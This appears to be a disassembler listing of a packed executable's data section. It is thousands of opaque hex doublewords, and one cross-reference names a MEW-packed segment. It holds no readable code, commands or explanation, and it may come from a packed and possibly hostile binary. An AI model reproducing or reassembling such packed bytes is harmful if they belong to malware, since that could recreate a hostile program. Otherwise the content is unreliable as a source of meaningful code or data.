dd 93543FA1h, 0ED7B17ECh, 715EA67Dh, 6567EB55h, 0AC280CF0h
dd 67E41C4Bh, 0E697A35Bh, 9033D0A4h, 3FDAC75h, 0E199F341h
dd 0D46BB878h, 0E1293BBFh, 7EA599F8h, 35992617h, 0A4A5151Dh
dd 19950C83h, 0E1E9BC9h, 7C4DDC69h, 755F1891h, 8F36792Eh
dd 0BADC61A7h, 570F9CB9h, 0C5B68652h, 2C817A8Eh, 0A6A4F43Dh
dd 0FE401A79h, 0F0670BE4h, 19B1C723h, 870651BFh, 9A01AE49h
dd 0F44FB299h, 0BD2E3765h, 2EE48473h, 21E5C929h, 98313157h
dd 0FA00256Ah, 502AC80Ch, 0BB41A5A7h, 0A4DB5C1Bh, 470CC4B0h
dd 0DF59CB54h, 4D29A87Bh, 556E38B2h, 79B8A70Eh, 0F99EADB1h
dd 154145FDh, 61A7DB47h, 7D719053h, 953B54ECh, 0EBD6CFE4h
dd 95B85476h, 0C3160E3Eh, 0F4136118h, 0CA5DF5F1h, 690FB27Dh
dd 2017C192h, 5B392212h, 0DA29244h, 0C6C0A608h, 0D2541CB4h
dd 0DD9AB367h, 0E8A85DBFh, 9B332585h, 97A951D2h, 0F91A274h
dd 6D4E8BE7h, 0A52EB3ADh, 0C981B4E1h, 2BF44611h, 0DC9FF41Eh
dd 0E7278AC7h, 51862778h, 822E28Dh, 689BB816h, 0ADE3E79Bh
dd 8A251F69h, 0F7EE5687h, 0E09D018Ch, 3B67F886h, 0B3259FC7h
dd 34FFAC52h, 4CFF9593h, 43E058D5h, 29C83B1Eh, 0F72D292Bh
dd 9412C86Fh, 0B1709B1Ch, 0C2A167A8h, 0A00DCDCAh, 6A00F39Bh
dd 0C19EFD4h, 9DFF0A56h, 2C406711h, 687A8370h, 6A9A5FC7h
dd 0F6C414DAh, 0D7CDE1E3h, 7FB10BECh, 2DA8591Fh, 8EC11E65h
dd 296AF0C7h, 0E75AB92Dh, 9A977CC6h, 628942C8h, 134A3764h
dd 7A7AD5E0h, 0EB3F7909h, 0ECFB218Fh, 9A02831Ch, 5E850776h
dd 8D38F26Dh, 48237959h, 2C5D6656h, 5BBC6019h, 51500F8h
dd 7E4D079Dh, 837D7DB1h, 0E7ABB8F1h, 7A66AF65h, 0ED8E523Fh
dd 5E917B7Bh, 1358C481h, 0ED64F359h, 0FC0C3B1Eh, 0E0C2BF2h
dd 664B3687h, 9BAE5BD9h, 705F332Eh, 795C387Ah, 0F47BC2B0h
dd 33278CB9h, 0EA4EBDC2h, 3EB579A3h, 85553F3h, 2C1EF7h
dd 6FB5D38Ch, 6BA1D366h, 0A6D6C396h, 318E7BCh, 76CEC424h
dd 8C9CA25Dh, 0F5B63A45h, 44AA1429h, 0ECD10C2Dh, 46B2DBA6h
dd 672FE907h, 0AC8E5642h, 6EBC64DFh, 107AD3AFh, 5700B80Ah
dd 335A8FFAh, 4BAE0FFBh, 1C1ADF2Bh, 3F1F7478h, 6A317D49h
dd 9739BCB6h, 52C16C6Eh, 4FD132D5h, 0BDE77C76h, 74750D46h
dd 0C2E55A72h, 58763BD6h, 3594CAA4h, 0B6BAE230h, 0F368A667h
dd 0DCCCF95Ah, 0CC5402C3h, 544CF8ABh, 9C3D5190h, 6423EAEAh
dd 20A19774h, 8964CAECh, 5D735E63h, 0F76D48BBh, 992F8464h
dd 4576357Ah, 5E8C0F3Fh, 22A64699h, 80794F8h, 141ABF63h
dd 0F1270311h, 346629BAh, 0AC087B85h, 958EBB1Dh, 8C041255h
dd 835B6795h, 0B64C4F0Dh, 0E6DDBBCEh, 26252CE5h, 3204A21Ch
dd 50E4E0F9h, 9B0DD4C9h, 83D39739h, 600F282Eh, 0E1A595BBh
dd 2F852B43h, 0E41ABF73h, 0A0C65042h, 0F94569D5h, 95A9FB97h
dd 0B68EFFF3h, 0B6091DFFh, 827185E0h, 0F44CC71h, 3078FF46h
dd 0E4430537h, 0EAC4A293h, 0AC99CBA7h, 0F12A083Fh, 84772CD8h
dd 1B5E429Ch, 2330EA16h, 6F288CC1h, 55DEFC6h, 2EA45F38h
dd 0A5A559E3h, 1765A2B4h, 4D84226Ah, 43F5CB91h, 2E54A89Eh
dd 1BAE16C4h, 172BAC2Ch, 689420B9h, 4BF95B9Fh, 9B1A1DE0h
dd 97490CB2h, 0BF70CBADh, 1E097EC5h, 0BB086260h, 31AB07ADh
dd 0FD5EEE2h, 3F1A908Eh, 91D68ADAh, 0E3D29608h, 7F51EAC2h
dd 0E9BF683Ch, 0EADA0CD7h, 6D90B7F6h, 5314E4FEh, 0F80A16E5h
dd 0BD05705Ah, 0F900E498h
dd 1C967830h, 857EC013h, 74BF88BDh, 0FE2BE4B3h, 0EB9DA47Bh
dd 8D6C97DFh, 303B64BAh, 9A3AEBAEh, 0DB25E231h, 97176CC3h
dd 2D014480h, 0CD3E17Eh, 754DD9CDh, 70702838h, 0AE7E0A6Eh
dd 0D545E1C9h, 0BC377545h, 7C38B57Dh, 0E84ECF81h, 31D7091Fh
dd 26449E88h, 0C5B9425Bh, 96DEB4B7h, 0FDBFFCAAh, 5A145A8Eh
dd 0EB627234h, 962597B6h, 7838FD96h, 7BCA487Ah, 0F35CCEDEh
dd 6D60D785h, 0E9EDC168h, 0AA0DBEA9h, 8E0F6E18h, 0BC1A0C01h
dd 40D27EACh, 19BC1EEBh, 0D79723C6h, 0B85E3351h, 9AFE55C0h
dd 6F33FC06h, 153719A4h, 0D37FFCA2h, 581E001Bh, 0FDF42D00h
dd 932D9535h, 9883F06Ah, 5973E7F5h, 380298DDh, 0C5DF8F97h
dd 9F4BBDF3h, 4DD886A8h, 25855DF1h, 0FEAE80E3h, 0BDB78F8h
dd 91BABA4Dh, 0B0A78DD0h, 9401B461h, 2B6700BBh, 80957C35h
dd 5430548Fh, 729D1AA5h, 67A650F8h, 0FE41AF8Ah, 0C4B455CEh
dd 38E558B4h, 57342EB3h, 691D253Bh, 8F5AA9CAh, 2547511Ah
dd 58DA1059h, 7CC3C4FDh, 0C9B1A78Ch, 0ED30AA39h, 31BFF914h
dd 602B68C5h, 5A58BB93h, 66AD9455h, 0BCC47175h, 0E0E010EAh
dd 87DB8F3Dh, 0FC27FA57h, 93C0761Dh, 76B23990h, 7FE391BDh
dd 3BEFC85Dh, 8BEC34A5h, 8A58FB8h, 0E2C2423Bh, 8773798Bh
dd 0AFCD2FD7h, 8CB942D2h, 1DDDD46h, 2A9889EDh, 8A2F76C6h
dd 0D6CCE1FDh, 5730DF53h, 17AC7B19h, 53959E15h, 83516B28h
dd 5726C1B4h, 54F26385h, 5D6AB10Bh, 85F86CFDh, 15B3A008h
dd 1E86EC2Bh, 0AD8E7728h, 6B259C4h, 33CD140Bh, 6876B174h
dd 3845851Bh, 501C26ABh, 0D8EB9EB7h, 0C20106F9h, 0CCA2176Dh
dd 0A4C2FA50h, 0B10CE2C4h, 0CB278245h, 0CD78EABBh, 0FAEE10C8h
dd 0FA312D78h, 296B6409h, 7FA345EAh, 0C4B90062h, 7A63E212h
dd 5B7E6198h, 5999D9EDh, 5F92A65Fh, 0D9BC2883h, 879E71CEh
dd 4455FA51h, 18516860h, 25CAF411h, 5399B59Ah, 188EBE30h
dd 0A1D6F29Fh, 96F40218h, 636A5BA5h, 923248h, 43F5879Eh
dd 85BF530Eh, 770A784h, 3D718AF2h, 0DF55B37Eh, 90BBA0FDh
dd 61A1561Bh, 3BA1D385h, 67A02940h, 15309283h, 6B85E892h
dd 0A19339A1h, 0F83026E9h, 0DA87AD47h, 5865A0ADh, 7284D7F7h
dd 4704334Ch, 0F1ED102Bh, 80DC6F71h, 0B1016FF9h, 39334B38h
dd 56BFDF87h, 6F7912DFh, 0DE149425h, 0B7017570h, 0C18548C7h
dd 0BD88B6C3h, 0F0BC03F6h, 4A794121h, 146AEEDEh, 1EE0AC1h
dd 87B5D4BEh, 5EBD8AF5h, 6F70818Dh, 0ADD87FB2h, 93973EDh
dd 392B9EAh, 0B5340E31h, 91FAFF5Fh, 0A1757C12h, 8EB3986Bh
dd 2EA80E71h, 79A58D2Ch, 0EACFB168h, 0E5E0B26Dh, 49FAA530h
dd 0C9293EDEh, 0DD09B8CDh, 9467C2CBh, 0ED11BA46h, 65573F05h
dd 0F16F86D3h, 0AB6EC18Dh, 7D8C41BBh, 79047589h, 72874163h
dd 0D89F37F9h, 0DAFBE0DAh, 0D092486Dh, 56AA2E82h, 2237B32Ch
dd 2CB59C61h, 0AFD4895Bh, 1F5BEC1Bh, 0AFB1D135h, 2112AA31h
dd 1DB1E0AFh, 0A8C13207h, 3AE19137h, 0BE03B386h, 0EC0A4063h
dd 0DB31801Dh, 8CC18A08h, 82ADF5D2h, 0DB821008h, 0B2AF755Eh
dd 0A3022EC0h, 81BE7A05h, 0ADFE2Fh, 9F079483h, 0E352398Fh
dd 0E3D3E3F2h, 11129F75h, 0CF2710F9h, 0F0A6345Ch, 4B395355h
dd 88F75A68h, 0D64686A1h, 9CC994CAh, 0C26D760Fh, 16A6077Dh
dd 7C1980E5h, 0A43C18B0h, 6C932502h, 8061314Ah, 9488816Ah
dd 0CF6A5737h, 598E5D0Eh, 55A3C6D9h, 0BC345477h, 552B6C23h
dd 101F54D4h, 0EE07EE7Ch, 36E310E0h, 0B3F09BE0h, 0C1125ED4h
dd 0B776FF82h, 0F8CF5B04h, 0B04252F7h, 845EECAAh, 646D738Dh
dd 16F20A8Fh, 36089E56h, 19D36BF1h, 0E45064B8h, 9F27210Fh
dd 0BB8E7CC3h, 5DC75F4Ah, 0EEED956Ch, 0A4991BFAh, 30D34A9Eh
dd 488B6311h, 956C7BFEh, 6E6A00Fh, 0E84BC9C9h, 8C5C9447h
dd 0F69A4BDCh, 0E6941A0Eh, 0EF189FB3h, 2AE9E9Fh, 0FE90E04h
dd 7CB64457h, 8E5A93B2h, 34B6DEAAh, 0CD60F7BFh, 5697A1BCh
dd 64C72693h, 1710A7E2h, 0EC0DB969h, 0F97AE3DDh, 0A41D5495h
dd 0C2DC1B97h, 0BF0050BEh, 872F551h, 0F6E387B7h, 1806FA20h
dd 71C27275h, 6B8FA4D6h, 7458DC00h, 3A837D47h, 0F64F6FB5h
dd 2DA68911h, 31BA485Bh, 74BD22Bh, 58EBD26Ah, 6AC20A6h
dd 696D7D94h, 0C53E6967h, 97CA5CF6h, 453EC8AEh, 0B5A26973h
dd 8F641FADh, 9B082FBAh, 48102CD3h, 2A0124BAh, 0FB268341h
dd 6E6811Fh, 0E720800Bh, 0F2789EDCh, 58B33032h, 43D07ABCh
dd 0EC685B2Dh, 7F662D5Ah, 2EF84873h, 0B7E2D483h, 0C0BC9A80h
dd 0FB89B144h, 711FBFB2h, 0DE4A6C0Ah, 0C59E5D6Eh, 0BE2EE522h
dd 48BD2ED5h, 55D75991h, 920AD201h, 1DF3ACE6h, 0A9605B44h
dd 5D8FA4C7h, 33086A16h, 4FAF2EFh, 75340667h, 0F5AD2381h
dd 0C35DE330h, 23B2B520h, 96E9FFFh, 0A5800C40h, 0CE473726h
dd 7C2A77F1h, 9BBBB233h, 6DE28EC0h, 9EC76B31h, 85661AEBh
dd 4FAD49AAh, 0A7FEEE1Dh, 7A967998h, 0CB6A3990h, 9AD7A9E6h
dd 74755BDEh, 0D7DB0842h, 0BDF81761h, 1826EF61h, 0EAE6F39Ah
dd 0E0C35948h, 148A61F1h, 0D6CA58C1h, 51E1FB89h, 0E14C8CCCh
dd 0F6438872h, 1D54842h, 0CA6DE25Ch, 0EDEA5C31h, 42D50259h
dd 8E299690h, 0F5E63B8Eh, 2CE1579Ah, 8ABE1888h, 6661AE72h
dd 0B3E447ABh, 5445CB7Fh, 0FCAEB1DDh, 973B440Eh, 3E384287h
dd 81419573h, 61136BC7h, 18EBD30h, 76072167h, 6A20B8B5h
dd 0F4433387h, 0E726C9AFh, 3275E06Bh, 5EA80FAAh, 9FE5D8EFh
dd 89C6B1D2h, 4DCA325h, 36070BBAh, 0B781C274h, 612D32DBh
dd 8E7F68DBh, 0D189A643h, 45387B03h, 8F24F7A2h, 838C3893h
dd 9E821DFAh, 693C6D3Bh, 0CBECC4CDh, 8D7441DEh, 2A6ABCE6h
dd 26C361C0h, 0C9F552EDh, 86D8BD60h, 0CE21A1AFh, 33D71E73h
dd 0F9C6E712h, 18361880h, 341BAF17h, 76DB92D1h, 7C41A391h
dd 6B4AB25h, 907BBC7h, 0EEE5DDADh, 0FAC39CCEh, 0F18504D7h
dd 93538006h, 2390A6Bh, 2D108594h, 40953A54h, 0BA2D4E8Fh
dd 3422074Dh, 9585ADBDh, 391EE942h, 8212749h, 0A000EE56h
dd 5A6540Fh, 835CA16h, 2A5DE6A5h, 1209A6A6h, 1616C19h
dd 3B518171h, 0FEAF0033h, 0A80741C3h, 0B6EC5EDDh, 0AD4D9408h
dd 0DFE5D009h, 67BF1148h, 0E93F825Dh, 0DE875FA2h, 7A8BD6A2h
dd 0DECAA47Ah, 43D1DE59h, 41DCCC85h, 6DD7BF3Ch, 0F647BFC2h
dd 659A2401h, 0C34870Dh, 6ACB2917h, 0E446C3CDh, 0D5BCEBBDh
dd 3B62BC07h, 67E31EAh, 58CCAADCh, 48A57C48h, 0BBA3C219h
dd 65EBC2E5h, 0C3FCD620h, 49A1FEF3h, 99A7510Bh, 0E39BC503h
dd 0A7B0A85Ch, 924E3631h, 98D8923Ch, 9E20E470h, 0BFBD96E9h
dd 0B920DB0Dh, 9FE68AEh, 4CA2F5A0h, 0C00F563Fh, 1BD0D376h
dd 0ACA8F273h, 0E2854507h, 0F358F2DAh, 5B0806ECh, 0C0297857h
dd 0DEB551A5h, 0DA0FB91Eh, 46B38651h, 90217110h, 0C3208553h
dd 2BA8D6B0h, 3D147233h, 9BC95CC2h, 0DB80D2CEh, 4000B0D1h
dd 55281B4Eh, 770056BCh, 0A46BF59Dh, 1A09EFAh, 8670A53Bh
dd 82A6D19Ah, 738DB03Fh, 54679E17h, 4923B3A0h, 0FCB94C28h
dd 4350FDB0h, 515B7E9Dh, 2AD0F22Eh, 0E7A50F01h, 0B39AFB80h
dd 629F07C8h, 6F08A7C2h, 8BE495Bh, 0B6D74144h, 0F43B2B20h
dd 0A15A15AEh, 0C21E9519h, 2515741Fh, 0DD6B5866h, 220AD10h
dd 26D2D9C3h, 7233928Ch, 4DCAE737h, 2D0DAE66h, 70DA9630h
dd 0CB72766Ah, 0FC8410ECh
dd 9C3148B6h, 0DAC5E3F1h, 84DA3096h, 81B7C835h, 0D79252E7h
dd 0A580B5D6h, 9C38771Fh, 8D7D76Fh, 5A7B9656h, 57BCC91Fh
dd 4812EA7Bh, 887E0D0Ch, 37F0560h, 2363F15Bh, 0E72B039h
dd 0E8E1A2C8h, 0C7CC8A2Ch, 0FD1FE371h, 3FDEB448h, 5BF54A86h
dd 2C2AB625h, 6D16A174h, 879F2597h, 0D9D3BCBEh, 529C22A7h
dd 46B5401h, 469D1AC2h, 0BE03DAE9h, 0C2A539A0h, 37F2C069h
dd 1AA40260h, 7A0A51D3h, 0B66BB516h, 0AACD3592h, 0B403D00Eh
dd 706D229Dh, 8CB5CD82h, 0F809230Ah, 2663DB18h, 7548A574h
dd 0F4C5D391h, 67DB6DE0h, 0CB57CF8h, 0A3A3D6DBh, 36E9550Dh
dd 33D878AFh, 6C6184CAh, 0FB3163F8h, 84CB1FE9h, 7D317065h
dd 0B5EAAA63h, 72E4A46Eh, 0EA1DD53Ah, 9324351Dh, 5EB9ED91h
dd 7170B312h, 0E2ACF18Ch, 0D58F04BDh, 4227AAABh, 124BE511h
dd 4C2C4DAEh, 1A4F8541h, 0FFDF63CFh, 0DB50C769h, 0F3B6D014h
dd 5E6E81EAh, 0FB865F6Bh, 70E374AFh, 0BC5D0F56h, 9E06B4DBh
dd 0DFA7F838h, 7E7AE558h, 0AF6820BFh, 63BD882Fh, 0AA3CEBh
dd 680E0BCEh, 0A98674C7h, 57152671h, 70B94402h, 2E0787EBh
dd 0CB0EA1BFh, 6055D73Eh, 3B35C307h, 2C27E9E2h, 0C8381A96h
dd 0B1354C0Fh, 0EA9C89A7h, 0DDF8C5B4h, 287A3322h, 7A95B2DAh
dd 376446CAh, 73C5FBB9h, 0A8072EF6h, 0CDD95AB7h, 49C0C063h
dd 0BC8F70BFh, 0BC43F4D6h, 0AA6E0F83h, 95E415AEh, 58E25911h
dd 405039C9h, 21098C89h, 21D488B3h, 65153D74h, 55635B76h
dd 60F8A4DFh, 8CC5AB36h, 0BD8B3B0Eh, 0E26D0563h, 37C6BCFh
dd 0FF35DE09h, 4A87F3F5h, 0D01FF326h, 56813CE3h, 0BF3B00B0h
dd 0EA23CB77h, 0F56F3478h, 0B7EA20EAh, 0B632D2B2h, 9A89EF96h
dd 0C1DB95CFh, 780A902Dh, 6479381Dh, 0A68A16Dh, 6AE23356h
dd 278F518Dh, 0E4D1B400h, 4022170Dh, 6AC48BB9h, 82C33CC0h
dd 44299C96h, 0D7C27E58h, 0D6278D2Ah, 0CCCA2E18h, 5983A59Ch
dd 0A652CA0h, 6A53C9FAh, 0F9622F75h, 0D2A6BC3Dh, 10C27629h
dd 79D3B62Dh, 8FC97EB7h, 556044DFh, 0CD7A2978h, 0CD1BA571h
dd 0A5B1F40Ah, 0BE890E74h, 909EC4F3h, 0A80EEB4Ah, 77B39EC3h
dd 7DCE9710h, 2A3DD652h, 5B2C26BAh, 53E21B24h, 0A8AE05E9h
dd 2F767C4Ah, 0FFAC6156h, 63CA059h, 343F7A13h, 50B8E11h
dd 41EA50D0h, 0A4FBC2A3h, 0C80D2368h, 9E1EBCD6h, 0F519D5B9h
dd 907CAA0Dh, 926F90F1h, 3BEEC6E2h, 0BBE632DDh, 8E1C1C26h
dd 623BFD37h, 79268F1Bh, 8C04F874h, 0E639FDFEh, 0C01BBB1Dh
dd 4670B153h, 0CE9A175Ch, 1298CB5Ah, 59098754h, 0F0E42235h
dd 0FE279DEh, 727FCBE5h, 5004E56Ch, 68DBCEFh, 0C892385Dh
dd 6DCF576Fh, 991160AAh, 0CB9B141Ah, 806C45F2h, 0DD19AD3Dh
dd 0FE18108Fh, 0D5823EBCh, 0CED681A8h, 0A3191501h, 0E9500DA7h
dd 0F3D92A14h, 0FCB74382h, 0F6BDAD56h, 0B41AC4ACh, 0D6FF3D7Ah
dd 6A51B41Dh, 64CDBA3Ah, 0B75762CFh, 0EED5F1A7h, 0D75F2464h
dd 0D8507B16h, 0F38BAA03h, 652E746Eh, 6A303A9h, 0F11EDD24h
dd 9271F395h, 9281BF87h, 1B2E6762h, 0B6C42809h, 66837E32h
dd 51C1D9h, 34B5BB40h, 309FA19Bh, 0C2D037Ch, 0BEC332E2h
dd 75E0DE88h, 1D8AA812h, 90473F9Fh, 0DC82B6E0h, 0F079489Fh
dd 5FEC3352h, 0B65F4654h, 2482339Fh, 0C929A51Ch, 8B405BB4h
dd 0C519E3DCh, 0D47225BAh, 0A283C237h, 9E0C15F2h, 0D2AC9493h
dd 0E5C29724h, 0DB87AFD7h, 0D149C0D5h, 5444A31h, 558A31ACh
dd 0AEE5809Bh, 53D39EDCh, 440A9FD0h, 0A6229E09h, 85433F69h
dd 383AF594h, 0DEA9736Fh, 2F12EB81h, 0E04047A8h, 0C293026Ah
dd 0BFC28745h, 0ACE021A4h, 830D69E7h, 90E7DE76h, 9E08E806h
dd 7387F04Ah, 261697F1h, 3706468Ch, 1EDCF603h, 32BDF5Dh
dd 44448BB4h, 0DE0C35DFh, 0A8DCE26Eh, 8E14DB79h, 9F5EF39Ah
dd 6BDCA6C3h, 859764EEh, 417569AEh, 0D89BAA07h, 6B1906F6h
dd 82976617h, 7F0C2C8h, 0AEE58A77h, 20A5EE7Ah, 380377A5h
dd 9C6722D5h, 678878DAh, 0F596947h, 30564931h, 59BF4A90h
dd 82929425h, 6232BC56h, 61011EF8h, 0B110CC8Ah, 0F9E980F6h
dd 0E0607ED9h, 4B4CD50Eh, 0F70A4315h, 21465541h, 0E2CBDFBEh
dd 0CEB64842h, 5FF784B5h, 0EECB2230h, 95E29FA7h, 795D663h
dd 8A826CDDh, 24A0B1AEh, 52F5DD1Fh, 0AAC9E539h, 5EE28979h
dd 28CFFDD1h, 0D8EDF7F5h, 0B874C2DEh, 5420EC4Ch, 790F7612h
dd 1873575Ch, 0C8E7F7AEh, 0CF9DB839h, 2EEEB0BBh, 22FA0104h
dd 0F894F63Ch, 0F568E7D1h, 7A0682B0h, 5A679B8Fh, 4135179Eh
dd 0E9379A76h, 37687E1Ch, 0B2DEC529h, 62C61E28h, 0F2D624EAh
dd 6191531Dh, 70AC618Bh, 3EE7D9E2h, 0B4FD4657h, 1CD9D181h
dd 5F941B0Fh, 578526BAh, 47F1859Eh, 76FFA357h, 7B57F85Fh
dd 31AD119Fh, 8462AB8Fh, 0D29524E9h, 4107F784h, 760E3C74h
dd 0A216278h, 0E808339Eh, 0EBEFAA42h, 18DB6C01h, 0DE87FA22h
dd 3DB97155h, 5EB0E95Dh, 66A8CEE7h, 96197B7Fh, 1DF63AF4h
dd 6F5C6A34h, 0BF2DB178h, 98DEB59Bh, 0DB006856h, 6DC3F9F0h
dd 848B8A4Ch, 27C4805Ah, 3D916D92h, 0D5772210h, 0BF321C91h
dd 3145A1EAh, 81582528h, 71A80F5Bh, 0F24193FDh, 502AB0ADh
dd 2F3ED068h, 0F561630Ah, 0EEFC1D27h, 0A21887CBh, 78FBF10Fh
dd 3C21AD5Eh, 7CA98394h, 4B4AAE67h, 662C9E8Bh, 3C233556h
dd 4BA55CD2h, 5F9FBB0Ah, 7CD02EF1h, 0E854458Bh, 3000AEA4h
dd 83257088h, 0D3C46DDDh, 0F2189840h, 5D330033h, 5FE15921h
dd 0EF67A5E4h, 86C69F1Bh, 0F135E705h, 0FD224CD5h, 0BE633683h
dd 4E33A101h, 50366A0Ah, 0E32A51F4h, 11D2BF5Bh, 7465D23Dh
dd 16DC7446h, 628788E4h, 89279CEDh, 7FD2CE9Ch, 416E4786h
dd 0E7521BEDh, 69678998h, 0E29486B3h, 0F990E000h, 1B232203h
dd 2989C1D3h, 3D468E25h, 929CD64Ah, 0A424FAB4h, 0EFE5EAEAh
dd 100FE21Ah, 0AC3CDDB1h, 3232F9B2h, 0DA63548Ch, 0A15B91D4h
dd 0CC627781h, 0E9C25BBh, 71A79218h, 0D5D2CB61h, 9BDB085Dh
dd 0F197C862h, 0FFFC16BAh, 0FA64880Ah, 0E255E7FFh, 2CD417F1h
dd 0AA529BB5h, 0BA78C67Dh, 196EA633h, 249BB88Bh, 32E7D089h
dd 426571E7h, 95C81FE6h, 0DB2559DFh, 18FD0304h, 0D85529C4h
dd 0AE9AFC3Fh, 0B14BBC3Ah, 4CCFD825h, 78C5CDF5h, 6B853C86h
dd 675F16B2h, 6CF1FB0Dh, 5DEF83E9h, 0B5494DFEh, 74BB30A0h
dd 0ED3BE6F9h, 9BBC4691h, 0B581038Eh, 8936DFBBh, 79C63752h
dd 0B8F98D8Bh, 60F1CC42h, 2E0C472Bh, 5DB586E6h, 1EEF0879h
dd 0F9C3642Fh, 38826397h, 6F179032h, 0C53B26C9h, 9FC2FE0Ah
dd 8EAEC90Fh, 8A5A5068h, 8CC25E9Dh, 9AE9B370h, 8AD45AD1h
dd 8B966BEBh, 0C932EA67h, 6D00E70Ah, 3E826327h, 0BAFC9CF6h
dd 71173EFCh, 79FE70CAh, 0B3F0596Ch, 0E3AA695Eh, 82781AAEh
dd 6BD93091h, 0BB677DC1h, 0F5139DFEh, 7639F280h, 83742668h
dd 8B537CF0h, 0EBD95309h, 0C0C02B59h, 0C0E78D24h, 14330142h
dd 0B3394488h, 9CD0A891h, 48D2AA59h, 2BB69730h, 9E1A4BBEh
dd 0E3B09249h, 3C64C19Bh, 0BDFD3D63h, 0C58771CBh, 0AD8CC279h
dd 0CCB63353h, 7E5B4B3h, 4BEAFE96h, 8ADBE97Fh, 0E1200812h
dd 86943D13h, 0FE156A72h, 3A044D47h, 18D811A2h, 2C040949h
dd 0B1640529h
dword_41005C dd 0DB3A8DACh, 0BB9E2757h, 4A0E002h, 0CF02D91Ah, 2C173A1Ah
; DATA XREF: MEW:off_402384�o
dd 0DF1C4FD0h, 5D75811Ch, 0D493CEB3h, 0F0640DCCh, 32C03B68h
dd 0B648209Fh, 1BD24147h, 0FAA30C31h, 67C6EAA0h, 3F116579h
dd 2F0CB16Dh, 0CC9ED19Bh, 0CEE965Bh, 1A0B0C28h, 110209A5h
dd 0CB15E8Fh, 0EBC449E3h, 0D8C6FD41h, 3E05425Bh, 9D7E2758h
dd 4134B7CAh, 8F2E5209h, 0CA4D496Ah, 1FCD578Fh, 0D3724D7Ch
dd 1B19A0E0h, 5304719Bh, 0B92CDB6Ch, 0C2B42A1Ch, 3415726Ah
dd 0B48FD5C1h, 84437DE3h, 0A037E5A6h, 5E3153BBh, 0D7CE6A94h
dd 0E0A8F1F7h, 0A2A0D71Dh, 0D94F9484h, 0E8506E38h, 26429D26h
dd 0D54B3264h, 6D711D20h, 0FA0E6DD2h, 8CD10BFFh, 960B08C4h
dd 7A2DE2FFh, 0D51D9DFAh, 7D2BBBD1h, 99048685h, 5E8537F1h
dd 6400473Fh, 4384629Bh, 8BC32038h, 51852858h, 2094E37Eh
dd 9CDC093Fh, 0D1523EE5h, 0D110ADEEh, 9700A9BFh, 5BA17A7Ch
dd 0E2B309E1h, 0CC8B3C1Fh, 4757D157h, 935C764Ch, 5803AAAEh
dd 848A4B3Fh, 68491DC8h, 5146B698h, 0DC218EBAh, 116CEAEBh
dd 96D36163h, 4B144442h, 4B3ADA50h, 0EB0BDC5Bh, 0B317908Fh
dd 1960EF67h, 0C6727BF8h, 0A634FDBCh, 0A88D4D21h, 50066A76h
dd 0DF789D92h, 974E5847h, 941BB226h, 0BD456AE9h, 4E922AC3h
dd 0C2B002FCh, 0EA3B769Eh, 291B271Bh, 8516FB4h, 0BC4EE601h
dd 4A6DD8D6h, 0A29F354Fh, 2A654CF2h, 0AC67B826h, 18AF8F03h
dd 1579AD5Fh, 16DD1794h, 1C757562h, 9A97742Bh, 9072006Dh
dd 0BC439AFCh, 54BD681h, 3740CE6Fh, 0D1DCA558h, 1A2F396Dh
dd 406684E1h, 0CB4D4A40h, 77745BA3h, 7724621Bh, 0F7D9E10Dh
dd 0A7E334EDh, 86D58C73h, 0C5081D72h, 908A8D7Ah, 0E6A836AFh
dd 6793D192h, 4277CB7Bh, 5B75528Ah, 0ECE362CCh, 400CFB2Eh
dd 5F0DE63Bh, 956CF5D8h, 1C5EB658h, 4575D760h, 0C0920574h
dd 896FA597h, 0FC49C126h, 0D710F9FBh, 0B61EE961h, 0B73F33B0h
dd 58A43D37h, 385DBCB6h, 85FA0356h, 0D9BB8D4Fh, 0BCAE8342h
dd 83BD628h, 3E410127h, 72ACBC19h, 7344815Eh, 0EDA15819h
dd 2DC5238Ah, 0BB0CF3EAh, 0E02A9CC5h, 66181DB4h, 5FA3AEBDh
dd 0D379B91Fh, 68845F4Ah, 0C0FDCB34h, 0EE25A6C7h, 0A35FAEDCh
dd 0A8DD9FD0h, 0B3C93B55h, 0F25C436Fh, 0A23AF27Dh, 0E1DE896h
dd 76A59DB6h, 0D6F0ABE5h, 2992A07Ah, 3170FDE8h, 0C1364992h
dd 0F75F40F6h, 6F147522h, 8440EF56h, 293ADF64h, 0DB3FC383h
dd 69AAFDA7h, 662FB652h, 6F67D0D0h, 93CACEBAh, 0B6A76DD3h
dd 5CD5B829h, 0D62D0F34h, 0BF9D2876h, 0ADC3AD77h, 0B486B359h
dd 0B9E4230Bh, 0B739F027h, 103046E5h, 0F6A6FBD8h, 9150A1E0h
dd 85C72E62h, 0D681258Ch, 5611EEDh, 0F9D5E612h, 0C234014Ah
dd 4DE10263h, 0B923A2B8h, 9892ADFCh, 8678F3F5h, 0F5496F62h
dd 495E29A6h, 2651BBCEh, 0D1F2FD46h, 0B7669301h, 428D7953h
dd 0EC8145C5h, 7F401535h, 8D8F4350h, 0BE6151Bh, 5F5F1FADh
dd 335C8D17h, 717686CFh, 5856A6FDh, 0FBF93198h, 37267BE5h
dd 5F926FAh, 0DCB81460h, 30877369h, 0F275945Bh, 9BFEC33Ch
dd 0DEE4FC72h, 5DDDDFA9h, 0E800991h, 2B7E85DAh, 0ACFB870Fh
dd 0EA0C91D7h, 18CC6C31h, 917CBB66h, 0CC45E51Fh, 23F142D7h
dd 1DC71276h, 6A1CE45h, 5A5992FEh, 791322Fh, 0C46C2E20h
dd 0FE498F2Eh, 122F45A7h, 9358A71Bh, 5E65D9FCh, 0CC7B1612h
dd 0E9A4E6F2h, 40371F47h, 0C85EEB10h, 0CAC43DFFh, 0FC2921CAh
dd 352AEDE3h, 356C6631h, 0B93DF554h, 8FDDD103h, 0FDFFC049h
dd 142172B2h, 5320E191h, 644EEF8Ah, 1AD94C6Eh, 35F7274Eh
dd 0D48FBDE7h, 983C12D3h, 3E43D665h, 3D5D1CD7h, 0AB20C012h
dd 53D57C4Bh, 1B81D66Eh, 0EE459461h, 3C7A3654h, 7FA55A0h
dd 0EE9746B1h, 9874ACB5h, 27EEB83Ch, 4F2B8F1Fh, 89C205A8h
dd 0EFB3718Ah, 67DFF3C9h, 0ACCD8340h, 0C4C77829h, 8CF4D9F4h
dd 973732B2h, 4938B9FEh, 0D974957Eh, 61FF5EFBh, 4EB73865h
dd 781AC298h, 0F4004B7Ch, 387FCF6Ch, 9551160Fh, 21892719h
dd 194048C7h, 61353C0Bh, 9EF1137Ch, 7285A018h, 34239F7Eh
dd 408EC9A4h, 7321FB8Dh, 0ACA59C4Fh, 11BC6FF4h, 7BBD4D30h
dd 291DA78Fh, 6111CC3h, 0EF56C54Dh, 0B7DC2873h, 43F92BF6h
